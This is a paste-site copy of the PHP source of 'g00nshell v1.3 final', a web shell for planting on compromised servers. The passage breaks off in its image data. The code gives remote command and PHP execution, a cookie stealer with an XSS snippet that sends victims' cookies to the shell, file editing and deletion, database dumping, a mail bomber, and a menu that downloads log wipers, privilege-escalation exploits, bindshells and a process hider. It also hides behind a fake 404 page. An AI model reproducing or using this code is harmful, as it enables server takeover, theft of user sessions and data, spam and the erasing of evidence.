g00nshell v1.3 final

From x, 4 Years ago, written in Plain Text, viewed 635 times.
URL http://paste.security-portal.cz/view/bee557b0 Embed
Download Paste or View Raw
  1.        
  2.  
  3.      <?php
  4.     /*
  5.     ######################################################################
  6.     # [g00n]FiSh presents: #
  7.     # g00nshell v1.3 final #
  8.     ############################DOCUMENTATION#############################
  9.     #To execute commands, simply include ?cmd=___ in the url. #
  10.     #Ex: http://site.com/shl.php?cmd=whoami #
  11.     # #
  12.     #To steal cookies, use ?cookie=___ in the url. #
  13.     #Ex: <script>document.location.href= #
  14.     #'http://site.com/shl.php?cookie='+document.cookies</script> #
  15.     ##########################VERIFICATION LEVELS#########################
  16.     #0: No protection; anyone can access #
  17.     #1: User-Agent required #
  18.     #2: Require IP #
  19.     #3: Basic Authentication #
  20.     ##############################KNOWN BUGS##############################
  21.     #Windows directory handling #
  22.     # #
  23.     #The SQL tool is NOT complete. There is currently no editing function#
  24.     #available. Some time in the future this may be fixed, but for now #
  25.     #don't complain to me about it #
  26.     ################################SHOUTS################################
  27.     #pr0be - Beta testing & CSS #
  28.     #TrinTiTTY - Beta testing #
  29.     #clorox - Beta testing #
  30.     #Everyone else at g00ns.net #
  31.     ########################NOTE TO ADMINISTRATORS########################
  32.     #If this script has been found on your server without your approval, #
  33.     #it would probably be wise to delete it and check your logs. #
  34.     ######################################################################
  35.     */
  36.     error_reporting(0);
  37.     // Configuration
  38.     $auth = 0;
  39.     $uakey = "724ea055b975621b9d679f7077257bd9"; // MD5 encoded user-agent
  40.     $IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell
  41.     $email = ""; // E-mail address where cookies will be sent
  42.     $user = "55c4b3899b00d20543d41170d2775e8f"; // MD5 encoded User
  43.     $pass = "8634361d1a2e44420f44ef3612706bb5"; // MD5 encoded Password
  44.      
  45.     // Global Variables
  46.     $version = "1.3 final";
  47.     $self = $_SERVER['PHP_SELF'];
  48.     $soft = $_SERVER["SERVER_SOFTWARE"];
  49.     $servinf = split("[:]", getenv('HTTP_HOST'));
  50.     $servip = $servinf[0];
  51.     $servport = $servinf[1];
  52.     $uname = php_uname();
  53.     $curuser = @exec('whoami');
  54.     $cmd = $_GET['cmd'];
  55.     $act = $_GET['act'];
  56.     $cmd = $_GET['cmd'];
  57.     $cookie = $_GET['cookie'];
  58.     $f = $_GET['f'];
  59.     $curdir = cleandir(getcwd());
  60.     if(!$dir){$dir = $_GET['dir'];}
  61.     elseif($dir && $_SESSION['dir']){$dir = $_SESSION['dir'];}
  62.     elseif($dir && $_SESSION['dir']){$dir = $curdir;}
  63.     if($dir && $dir != "nullz"){$dir = cleandir($dir);}
  64.     $contents = $_POST['contents'];
  65.     $gf = $_POST['gf'];
  66.     $img = $_GET['img'];
  67.     session_start();
  68.     @set_time_limit(5);
  69.     switch($auth){ // Authentication switcher
  70.     case 0: break;
  71.     case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey){hide();} break;
  72.     case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)){hide();} break;
  73.     case 3: if(!$_SERVER["PHP_AUTH_USER"]){userauth();} break;
  74.     }
  75.      
  76.     function userauth(){ // Basic authentication function
  77.     global $user, $pass;
  78.     header("WWW-Authenticate: Basic realm='Secure Area'");
  79.     if(md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"] != $pass)){
  80.     hide();
  81.     die();
  82.     }
  83.     }
  84.      
  85.     if(!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img){main();}
  86.     elseif(!$act && $cmd){
  87.     style();
  88.     echo("<b>Results:</b>\n<br><textarea rows=20 cols=100>");
  89.     $cmd = exec($cmd, $result);
  90.     foreach($result as $line){echo($line . "\n");}
  91.     echo("</textarea>");
  92.     }
  93.     elseif($cookie){@mail("$email", "Cookie Data", "$cookie", "From: $email"); hide();} // Cookie stealer function
  94.     elseif($act == "view" && $f && $dir){view($f, $dir);}
  95.     elseif($img){img($img);}
  96.     elseif($gf){grab($gf);}
  97.     elseif($dir){files($dir);}
  98.     else{
  99.     switch($act){
  100.     case "phpinfo": phpinfo();break;
  101.     case "sql": sql();break;
  102.     case "files": files($dir);break;
  103.     case "email": email();break;
  104.     case "cmd": cmd();break;
  105.     case "upload": upload();break;
  106.     case "tools": tools();break;
  107.     case "sqllogin": sqllogin();break;
  108.     case "sql": sql();break;
  109.     case "lookup": lookup();break;
  110.     case "kill": kill();break;
  111.     case "phpexec": execphp();break;
  112.     default: main();break;
  113.     }
  114.     }
  115.      
  116.     function cleandir($d){ // Function to clean up the $dir and $curdir variables
  117.     $d = realpath($d);
  118.     $d = str_replace("\\\\", "//", $d);
  119.     $d = str_replace("////", "//", $d);
  120.     $d = str_replace("\\", "/", $d);
  121.     return($d);
  122.     }
  123.      
  124.      
  125.      
  126.     function hide(){ // Hiding function
  127.     global $self, $soft, $servip, $servport;
  128.     die("<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
  129.     <HTML><HEAD>
  130.     <TITLE>404 Not Found</TITLE>
  131.     </HEAD><BODY>
  132.     <H1>Not Found</H1>
  133.     The requested URL $self was not found on this server.<P>
  134.     <P>Additionally, a 404 Not Found
  135.     error was encountered while trying to use an ErrorDocument to handle the request.
  136.     <HR>
  137.     <ADDRESS>$soft Server at $servip Port $servport</ADDRESS>
  138.     </BODY></HTML>");
  139.     }
  140.      
  141.     function style(){ // Style / header function
  142.     global $servip,$version;
  143.     echo("<html>\n
  144.     <head>\n
  145.     <title>g00nshell v" . $version . " - " . $servip . "</title>\n
  146.     <style>\n
  147.     body { background-color:#000000; color:white; font-family:Verdana; font-size:11px; }\n
  148.     h1 { color:white; font-family:Verdana; font-size:11px; }\n
  149.     h3 { color:white; font-family:Verdana; font-size:11px; }\n
  150.     input,textarea,select { color:#FFFFFF; background-color:#2F2F2F; border:1px solid #4F4F4F; font-family:Verdana; font-size:11px; }\n
  151.     textarea { font-family:Courier; font-size:11px; }\n
  152.     a { color:#6F6F6F; text-decoration:none; font-family:Verdana; font-size:11px; }\n
  153.     a:hover { color:#7F7F7F; }\n
  154.     td,th { font-size:12px; vertical-align:middle; }\n
  155.     th { font-size:13px; }\n
  156.     table { empty-cells:show;}\n
  157.     .inf { color:#7F7F7F; }\n
  158.     </style>\n
  159.     </head>\n");
  160.     }
  161.      
  162.     function main(){ // Main/menu function
  163.     global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version;
  164.     style();
  165.     $act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP info', 'phpexec'=>'PHP Execute',
  166.     'tools'=>'Tools','sqllogin'=>'SQL','email'=>'Email','upload'=>'Get Files','lookup'=>'List Domains','bshell'=>'Bindshell','kill'=>'Kill Shell');
  167.     $capt = array_flip($act);
  168.     echo("<form method='GET' name='shell'>");
  169.     echo("<b>Host:</b> <span class='inf'>" . $servip . "</span><br>");
  170.     echo("<b>Server software:</b> <span class='inf'>" . $soft . "</span><br>");
  171.     echo("<b>Uname:</b> <span class='inf'>" . $uname . "</span><br>");
  172.     echo("<b>Shell Directory:</b> <span class='inf'>" . getcwd() . "</span><br>");
  173.     echo("<div style='display:none' id='info'>");
  174.     echo("<b>Current User:</b> <span class='inf'>" . $curuser . "</span><br>");
  175.     echo("<b>ID:</b> <span class='inf'>" . @exec('id') . "</span><br>");
  176.     if(@ini_get('safe_mode') != ""){echo("<b>Safemode:</b> <font color='red'>ON</font>");}
  177.     else{echo("<b>Safemode:</b> <font color='green'>OFF</font>");}
  178.     echo("\n<br>\n");
  179.     if(@ini_get('open_basedir') != ""){echo("<b>Open Base Dir:</b> <font color='red'>ON</font> [ <span class='inf'>" . ini_get('open_basedir') . "</span> ]");}
  180.     else{echo("<b>Open Base Dir:</b> <font color='green'>OFF</font>");}
  181.     echo("\n<br>\n");
  182.     if(@ini_get('disable_functions') != ""){echo("<b>Disabled functions:</b> " . @ini_get('disable_functions'));}
  183.     else{echo("<b>Disabled functions:</b> None");}
  184.     echo("\n<br>\n");
  185.     if(@function_exists(mysql_connect)){echo("<b>MySQL:</b> <font color='green'>ON</font>");}
  186.     else{echo("<b>MySQL:</b> <font color='red'>OFF</font>");}
  187.     echo("</div>");
  188.     echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display = 'block';\">More</a> ] ");
  189.     echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display = 'none';\">Less</a> ]");
  190.     echo("<center>");
  191.     echo("<h3 align='center'>Links</h3>");
  192.     if($_SERVER['QUERY_STRING']){foreach($act as $link){echo("[ <a href='?" . $_SERVER['QUERY_STRING'] . "&act=" . $capt[$link] . "' target='frm'>" . $link . "</a> ] ");}}
  193.     else{foreach($act as $link){echo("[ <a href='?act=" . $capt[$link] . "' target='frm'>" . $link . "</a> ] ");}}
  194.     echo("</center>");
  195.     echo("<hr>");
  196.     echo("<br><iframe name='frm' style='width:100%; height:65%; border:0;' src='?act=files'></iframe>");
  197.     echo("<pre style='text-align:center'>:: g00nshell <font color='red'>v" . $version . "</font> ::</pre>");
  198.     die();
  199.     }
  200.      
  201.     function cmd(){ // Command execution function
  202.     style();
  203.     echo("<form name='CMD' method='POST'>");
  204.     echo("<b>Command:</b><br>");
  205.     echo("<input name='cmd' type='text' size='50'> ");
  206.     echo("<select name='precmd'>");
  207.     $precmd = array(''=>'','Read /etc/passwd'=>'cat /etc/passwd','Open ports'=>'netstat -an',
  208.     'Running Processes'=>'ps -aux', 'Uname'=>'uname -a', 'Get UID'=>'id',
  209.     'Create Junkfile (/tmp/z)'=>'dd if=/dev/zero of=/tmp/z bs=1M count=1024',
  210.     'Find passwd files'=>'find / -type f -name passwd');
  211.     $capt = array_flip($precmd);
  212.     foreach($precmd as $c){echo("<option value='" . $c . "'>" . $capt[$c] . "\n");}
  213.     echo("</select><br>\n");
  214.     echo("<input type='submit' value='Execute'>\n");
  215.     echo("</form>\n");
  216.     if($_POST['cmd'] != ""){$x = $_POST['cmd'];}
  217.     elseif($_POST['precmd'] != ""){$x = $_POST['precmd'];}
  218.     else{die();}
  219.     echo("Results: <br><textarea rows=20 cols=100>");
  220.     $cmd = @exec($x, $result);
  221.     foreach($result as $line){echo($line . "\n");}
  222.     echo("</textarea>");
  223.     }
  224.      
  225.     function execphp(){ // PHP code execution function
  226.     style();
  227.     echo("<h4>Execute PHP Code</h4>");
  228.     echo("<form method='POST'>");
  229.     echo("<textarea name='phpexec' rows=5 cols=100>");
  230.     if(!$_POST['phpexec']){echo("/*Don't include <? ?> tags*/\n");}
  231.     echo(htmlentities($_POST['phpexec']) . "</textarea>\n<br>\n");
  232.     echo("<input type='submit' value='Execute'>");
  233.     echo("</form>");
  234.     if($_POST['phpexec']){
  235.     echo("<textarea rows=10 cols=100>");
  236.     eval(stripslashes($_POST['phpexec']));
  237.     echo("</textarea>");
  238.     }
  239.     }
  240.      
  241.     function sqllogin(){ // MySQL login function
  242.     session_start();
  243.     if($_SESSION['isloggedin'] == "true"){
  244.     header("Location: ?act=sql");
  245.     }
  246.     style();
  247.     echo("<form method='post' action='?act=sql'>");
  248.     echo("User:<br><input type='text' name='un' size='30'><br>\n");
  249.     echo("Password:<br><input type='text' name='pw' size='30'><br>\n");
  250.     echo("Host:<br><input type='text' name='host' size='30' value='localhost'><br>\n");
  251.     echo("Port:<br><input type='text' name='port' size='30' value='3306'><br>\n");
  252.     echo("<input type='submit' value='Login'>");
  253.     echo("</form>");
  254.     die();
  255.     }
  256.      
  257.     function sql(){ // General SQL Function
  258.     session_start();
  259.     if(!$_GET['sqlf']){style();}
  260.     if($_POST['un'] && $_POST['pw']){;
  261.     $_SESSION['sql_user'] = $_POST['un'];
  262.     $_SESSION['sql_password'] = $_POST['pw'];
  263.     }
  264.     if($_POST['host']){$_SESSION['sql_host'] = $_POST['host'];}
  265.     else{$_SESSION['sql_host'] = 'localhost';}
  266.     if($_POST['port']){$_SESSION['sql_port'] = $_POST['port'];}
  267.     else{$_SESSION['sql_port'] = '3306';}
  268.      
  269.     if($_SESSION['sql_user'] && $_SESSION['sql_password']){
  270.     if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){
  271.     unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
  272.     echo("Invalid credentials<br>\n");
  273.     die(sqllogin());
  274.     }
  275.     else{
  276.     $_SESSION['isloggedin'] = "true";
  277.     }
  278.     }
  279.     else{
  280.     die(sqllogin());
  281.     }
  282.      
  283.     if ($_GET['db']){
  284.     mysql_select_db($_GET['db'], $sqlcon);
  285.     if($_GET['sqlquery']){
  286.     $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error());
  287.     $num = mysql_num_rows($dat);
  288.     for($i=0;$i<$num;$i++){
  289.     echo(mysql_result($dat, $i) . "<br>\n");
  290.     }
  291.     }
  292.     else if($_GET['table'] && !$_GET['sqlf']){
  293.     echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&sqlf=ins'>Insert Row</a><br><br>\n");
  294.     echo("<table border='1'>");
  295.     $query = "SHOW COLUMNS FROM " . $_GET['table'];
  296.     $result = mysql_query($query, $sqlcon) or die(mysql_error());
  297.     $i = 0;
  298.     $fields = array();
  299.     while($row = mysql_fetch_assoc($result)){
  300.     array_push($fields, $row['Field']);
  301.     echo("<th>" . $fields[$i]);
  302.     $i++;
  303.     }
  304.     $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
  305.     $num_rows = mysql_num_rows($result) or die(mysql_error());
  306.     $y=0;
  307.     for($x=1;$x<=$num_rows+1;$x++){
  308.     if(!$_GET['p']){
  309.     $_GET['p'] = 1;
  310.     }
  311.     if($_GET['p']){
  312.     if($y > (30*($_GET['p']-1)) && $y <= 30*($_GET['p'])){
  313.     echo("<tr>");
  314.     for($i=0;$i<count($fields);$i++){
  315.     $query = "SELECT " . $fields[$i] . " FROM " . $_GET['table'] . " WHERE " . $fields[0] . " = '" . $x . "'";
  316.     $dat = mysql_query($query, $sqlcon) or die(mysql_error());
  317.     while($row = mysql_fetch_row($dat)){
  318.     echo("<td>" . $row[0] . "</td>");
  319.     }
  320.     }
  321.     echo("</tr>\n");
  322.     }
  323.     }
  324.     $y++;
  325.     }
  326.     echo("</table>\n");
  327.     for($z=1;$z<=ceil($num_rows / 30);$z++){
  328.     echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $z . "'>" . $z . "</a> | ");
  329.     }
  330.     }
  331.     elseif($_GET['table'] && $_GET['sqlf']){
  332.     switch($_GET['sqlf']){
  333.     case "dl": sqldownload();break;
  334.     case "ins": sqlinsert();break;
  335.     default: $_GET['sqlf'] = "";
  336.     }
  337.     }
  338.     else{
  339.     echo("<table>");
  340.     $query = "SHOW TABLES FROM " . $_GET['db'];
  341.     $dat = mysql_query($query, $sqlcon) or die(mysql_error());
  342.     while ($row = mysql_fetch_row($dat)){
  343.     echo("<tr><td><a href='?act=sql&db=" . $_GET['db'] . "&table=" . $row[0] ."'>" . $row[0] . "</a></td><td>[<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $row[0] ."&sqlf=dl'>Download</a>]</td></tr>\n");
  344.     }
  345.     echo("</table>");
  346.     }
  347.     }
  348.     else{
  349.     $dbs=mysql_list_dbs($sqlcon);
  350.     while($row = mysql_fetch_object($dbs)) {
  351.     echo("<a href='?act=sql&db=" . $row->Database . "'>" . $row->Database . "</a><br>\n");
  352.     }
  353.     }
  354.     mysql_close($sqlcon);
  355.     }
  356.      
  357.     function sqldownload(){ // Download sql file function
  358.     @ob_flush;
  359.     $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']);
  360.     mysql_select_db($_GET['db'], $sqlcon);
  361.     $query = "SHOW COLUMNS FROM " . $_GET['table'];
  362.     $result = mysql_query($query, $sqlcon) or die(mysql_error());
  363.     $fields = array();
  364.     while($row = mysql_fetch_assoc($result)){
  365.     array_push($fields, $row['Field']);
  366.     $i++;
  367.     }
  368.     $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
  369.     $num_rows = mysql_num_rows($result) or die(mysql_error());
  370.     for($x=1;$x<$num_rows;$x++){
  371.     $out .= "(";
  372.     for($i=0;$i<count($fields);$i++){
  373.     $out .= "'";
  374.     $query = "SELECT " . $fields[$i] . " FROM " . $_GET['table'] . " WHERE " . $fields[0] . " = '" . $x . "'";
  375.     $dat = mysql_query($query, $sqlcon) or die(mysql_error());
  376.     while($row = mysql_fetch_row($dat)){
  377.     if($row[0] == ""){
  378.     $row[0] = "NULL";
  379.     }
  380.     if($i != count($fields)-1){
  381.     $out .= str_replace("\r\n", "\\r\\n", $row[0]) . "', ";
  382.     }
  383.     else{
  384.     $out .= $row[0]. "'";
  385.     }
  386.     }
  387.     }
  388.     $out .= ");\n";
  389.     }
  390.     $filename = $_GET['table'] . "-" . time() . '.sql';
  391.     header("Content-type: application/octet-stream");
  392.     header("Content-length: " . strlen($out));
  393.     header("Content-disposition: attachment; filename=" . $filename . ";");
  394.     echo($out);
  395.     die();
  396.     }
  397.      
  398.     function sqlinsert(){
  399.     style();
  400.     $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']);
  401.     mysql_select_db($_GET['db'], $sqlcon);
  402.     if($_POST['ins']){
  403.     unset($_POST['ins']);
  404.     $fields = array_flip($_POST);
  405.     $f = implode(",", $fields);
  406.     $v = implode(",", $_POST);
  407.     $query = "INSERT INTO " . $_GET['table'] . " (" . $f . ") VALUES (" . $v . ")";
  408.     mysql_query($query, $sqlcon) or die(mysql_error());
  409.     die("Row inserted.<br>\n<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "'>Go back</a>");
  410.     }
  411.     $query = "SHOW COLUMNS FROM " . $_GET['table'];
  412.     $result = mysql_query($query, $sqlcon) or die(mysql_error());
  413.     $i = 0;
  414.     $fields = array();
  415.     echo("<form method='POST'>");
  416.     echo("<table>");
  417.     while($row = mysql_fetch_assoc($result)){
  418.     array_push($fields, $row['Field']);
  419.     echo("<tr><td><b>" . $fields[$i] . "</b><td><input type='text' name='" . $fields[$i] . "'><br>\n");
  420.     $i++;
  421.     }
  422.     echo("</table>");
  423.     echo("<br>\n<input type='submit' value='Insert' name='ins'>");
  424.     echo("</form>");
  425.     }
  426.      
  427.     function nicesize($size){
  428.     if(!$size){return false;}
  429.     if ($size >= 1073741824){return(round($size / 1073741824) . " GB");}
  430.     elseif ($size >= 1048576){return(round($size / 1048576) . " MB");}
  431.     elseif ($size >= 1024){return(round($size / 1024) . " KB");}
  432.     else{return($size . " B");}
  433.     }
  434.      
  435.     function files($dir){ // File manipulator function
  436.     style();
  437.     global $self, $curdir;
  438.     if($dir==""){$dir = $curdir;}
  439.     $dirx = explode("/", $dir);
  440.     $files = array();
  441.     $folders = array();
  442.     echo("<form method='GET'>");
  443.     echo("<input type='text' name='dir' value='" . $dir . "' size='40'>");
  444.     echo("<input type='submit' value='Go'>");
  445.     echo("</form>");
  446.     echo("<h4>File list for ");
  447.     for($i=0;$i<count($dirx);$i++){
  448.     $totalpath .= $dirx[$i] . "/";
  449.     echo("<a href='?dir=" . $totalpath . "'>$dirx[$i]</a>" . "/");
  450.     }
  451.     echo("</h4>");
  452.     echo("<table>");
  453.     echo("<th>File Name<th>File Size</th>");
  454.     if ($handle = opendir($dir)) {
  455.     while (false != ($link = readdir($handle))) {
  456.     if (is_dir($dir . '/' . $link)){
  457.     $file = array();
  458.     if(is_writable($dir . '/' . $link)){$file['perm']='write';}
  459.     elseif(is_readable($dir . '/' . $link)){$file['perm']='read';}
  460.     else{$file['perm']='none';}
  461.     switch($file['perm']){
  462.     case "write": @$file['link'] = "<a href='?dir=$dir/$link'><font color='green'>$link</font></a>"; break;
  463.     case "read": @$file['link'] = "<a href='?dir=$dir/$link'><font color='yellow'>$link</font></a>"; break;
  464.     case "none": @$file['link'] = "<a href='?dir=$dir/$link'><font color='red'>$link</font></a>"; break;
  465.     default: @$file['link'] = "<a href='?dir=$dir/$link'><font color='red'>$link</font></a>"; break;
  466.     }
  467.     @$file['icon'] = "folder";
  468.     if($_SERVER['QUERY_STRING']){$folder = "<img src='?" . $_SERVER['QUERY_STRING'] . "&img=" . $file['icon']. "'> " . $file['link'];}
  469.     else{$folder = "<img src='?img=" . $file['icon']. "'> " . $file['link'];}
  470.     array_push($folders, $folder);
  471.     }
  472.     else{
  473.     $file = array();
  474.     $ext = strtolower(end(explode(".", $link)));
  475.     if(!$file['size'] = nicesize(@filesize($dir . '/' . $link))){
  476.     $file['size'] = "0B";
  477.     }
  478.     if(is_writable($dir . '/' . $link)){$file['perm']='write';}
  479.     elseif(is_readable($dir . '/' . $link)){$file['perm']='read';}
  480.     else{$file['perm']='none';}
  481.     switch($file['perm']){
  482.     case "write": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='green'>$link</font></a>"; break;
  483.     case "read": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='yellow'>$link</font></a>"; break;
  484.     case "none": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='red'>$link</font></a>"; break;
  485.     default: @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='red'>$link</a></font>"; break;
  486.     }
  487.     switch($ext){
  488.     case "exe": case "com": case "jar": case "": $file['icon']="binary"; break;
  489.     case "jpg": case "gif": case "png": case "bmp": $file['icon']="image"; break;
  490.     case "zip": case "tar": case "rar": case "gz": case "cab": case "bz2": case "gzip": $file['icon']="compressed"; break;
  491.     case "txt": case "doc": case "pdf": case "htm": case "html": case "rtf": $file['icon']="text"; break;
  492.     case "wav": case "mp3": case "mp4": case "wma": $file['icon']="sound"; break;
  493.     case "js": case "vbs": case "c": case "h": case "sh": case "pl": case "py": case "php": case "h": $file['icon']="script"; break;
  494.     default: $file['icon'] = "unknown"; break;
  495.     }
  496.     if($_SERVER['QUERY_STRING']){$file = "<tr><td><img src='?" . $_SERVER['QUERY_STRING'] . "&img=" . $file['icon']. "' height='18' width='18'> " . $file['link'] . "</td><td>" . $file['size'] . "</td></tr>\n";}
  497.     else{$file = "<tr><td><img src='?img=" . $file['icon']. "' height='18' width='18'> " . $file['link'] . "<td>" . $file['size'] . "</td></tr>\n";}
  498.     array_push($files, $file);
  499.     }
  500.     }
  501.     foreach($folders as $folder){echo("<tr><td>$folder</td><td>DIR</td></tr>\n");}
  502.     foreach($files as $file){echo($file);}
  503.     echo("</table>");
  504.     closedir($handle);
  505.     }
  506.     }
  507.      
  508.     function email(){ // Email bomber function
  509.     $times = $_POST['times'];
  510.     $to = $_POST['to'];
  511.     $subject = $_POST['subject'];
  512.     $body = $_POST['body'];
  513.     $from = $_POST['from'];
  514.      
  515.     style();
  516.     echo("<h2>Mail Bomber</h2>
  517.     <form method='POST' action='?act=email'>
  518.     <b>Your address:</b><br>
  519.     <input name='from' type='text' size='35'><br>
  520.     <b>Their address:</b><br>
  521.     <input name='to' type='text' size='35'><br>
  522.     <b>Subject:</b><br>
  523.     <input name='subject' type='text' size='35'><br>
  524.     <b>Text:</b><br>
  525.     <input name='body' type='text' size='35'><br>
  526.     <b>How many times:</b><br>
  527.     <input name='times' type='text' size='5'><br><br>
  528.     <input name='submit' type='submit' value='Submit'>
  529.     </form>");
  530.     if ($to && $from){for($i=0;$i<$times;$i++){mail("$to", "$subject", "$body", "From: $from");}}
  531.     }
  532.      
  533.     function view($filename, $dir){ // File view function
  534.     if($_POST['fileact'] == "Download"){
  535.     header("Content-type: application/octet-stream");
  536.     header("Content-length: ".strlen($_POST['contents']));
  537.     header("Content-disposition: attachment; filename=" . basename($filename) . ";");
  538.     $handle = fopen($filename, "r");
  539.     echo(fread($handle, filesize($filename)));
  540.     die();
  541.     }
  542.     style();
  543.     if($_POST['contents'] && $_POST['fileact'] == "Save"){
  544.     $handle = fopen($filename, 'w');
  545.     fwrite($handle, stripslashes($_POST['contents']));
  546.     fclose($handle);
  547.     echo("Saved file.<br><br>");
  548.     echo("<a href='?act=view&f=$filename&dir=nullz'>Go back</a>");
  549.     die();
  550.     }
  551.     elseif($_POST['fileact'] == "Delete"){
  552.     unlink($filename);
  553.     echo("Deleted file.<br><br>");
  554.     echo("<a href='?act=files'>Go back</a>");
  555.     die();
  556.     }
  557.      
  558.     if($dir != "nullz"){ // heh
  559.     $filename = $dir."/".$filename;
  560.     }
  561.     $bad = array("<", ">");
  562.     $good = array("<", ">");
  563.     $file = fopen($filename, 'r');
  564.     $content = fread($file, @filesize($filename));
  565.     echo("<form name='file' method='POST' action='?act=view&dir=$dir&f=$filename'>");
  566.     echo("<textarea style='width:100%; height:92%;' name='contents'>");
  567.     echo(str_replace($bad, $good, $content)."\n");
  568.     echo("</textarea>");
  569.     echo("<input name='fileact' type='submit' value='Save'>");
  570.     echo("<input name='fileact' type='submit' value='Delete'>");
  571.     echo("<input name='fileact' type='submit' value='Download'>");
  572.     echo("</form>");
  573.     }
  574.      
  575.     function edit($file, $contents){ // File edit function
  576.     style();
  577.     $handle = fopen($file, 'w');
  578.     fwrite($handle, $contents);
  579.     fclose($handle);
  580.     echo("Saved file.<br><br>");
  581.     echo("<a href='?act=files'>Go back</a>");
  582.     }
  583.      
  584.     function upload(){ // Uploading frontend function
  585.     global $curdir;
  586.     style();
  587.     echo("<form name='files' enctype='multipart/form-data' method='POST'>
  588.     <b>Output Directory</b><br>
  589.     <input type='text' name='loc' size='65' value='" . $curdir . "'><br><br>
  590.     <b>Remote Upload</b><br>
  591.     <input type='text' name='rem' size='65'>
  592.     <input type='submit' value='Grab'><br><br>
  593.     <b>Local File Upload</b><br>
  594.     <input name='up' type='file' size='65'>
  595.     <input type='submit' value='Upload'>
  596.     </form><br>");
  597.      
  598.     if($_POST['rem']){grab($_POST['rem']);}
  599.     if($_FILES['up']){up($_FILES['up']);}
  600.     }
  601.      
  602.     function up($up){ // Uploading backend function
  603.     style();
  604.     $updir = $_POST['loc'];
  605.     move_uploaded_file($up["tmp_name"], $updir . "/" . $up["name"]);
  606.     die("File has been uploaded.");
  607.     }
  608.      
  609.     function grab($file){ // Uploading backend function
  610.     style();
  611.     $updir = $_POST['loc'];
  612.     $filex = array_pop(explode("/", $file));
  613.     if(exec("wget $file -b -O $updir/$filex")){die("File has been uploaded.");}
  614.     else{die("File upload failed.");}
  615.     }
  616.      
  617.     function tools(){ // Useful tools function
  618.     global $curdir;
  619.     style();
  620.     $tools = array(
  621.     "--- Log wipers ---"=>"1",
  622.     "Vanish2.tgz"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz",
  623.     "Cloak.c"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak.c",
  624.     "gh0st.sh"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0st.sh",
  625.     "--- Priv Escalation ---"=>"2",
  626.     "h00lyshit - Linux 2.6 ALL"=>"http://someshit.net/files/xpl/h00lyshit",
  627.     "k-rad3 - Linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3",
  628.     "raptor - Linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor",
  629.     "rootbsd - BSD v?"=>"http://someshit.net/files/xpl/rootbsd",
  630.     "--- Bindshells ---"=>"3",
  631.     "THC rwwwshell-1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl",
  632.     "Basic Perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix",
  633.     "--- Misc ---"=>"4",
  634.     "MOCKS SOCKS4 Proxy"=>"http://superb-east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz",
  635.     "xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c");
  636.     $names = array_flip($tools);
  637.     echo("<b>Tools:</b>");
  638.     echo("<form method='post'>");
  639.     echo("<b>Output Directory</b><br>");
  640.     echo("<input type='text' name='loc' size='65' value='" . $curdir . "'><br><br>");
  641.     echo("<select name='gf' style='align:center;'>");
  642.     foreach($tools as $tool) {echo("<option value='" . $tool . "'>" . $names[$tool] . "</option>\n");}
  643.     echo("</select>");
  644.     echo("<br><input type='submit' value='Grab'>");
  645.     echo("</form>");
  646.     }
  647.      
  648.     function lookup(){ // Domain lookup function
  649.     style();
  650.     global $servinf;
  651.     $script = "import urllib, urllib2, sys, re
  652.     req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlencode({'domainname' : sys.argv[1]}))
  653.     site = re.findall('.+\) (.+)<br>', urllib2.urlopen(req).read())
  654.     for i in xrange(0,len(site)):
  655.     print site[i]"; // My ***y python script
  656.     $handle = fopen('lookup.py', 'w');
  657.     fwrite($handle, $script);
  658.     fclose($handle);
  659.     echo("<h4>Domains</h4>");
  660.     echo("<ul>");
  661.     $cmd = exec("python lookup.py " . $servinf[0], $ret);
  662.     foreach($ret as $site){echo("<li>" . $site . "\n");}
  663.     unlink('lookup.py');
  664.     }
  665.      
  666.      
  667.     function img($img){ // Images function
  668.     $images = array(
  669.     "folder"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAA" .
  670.     "gALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwq" .
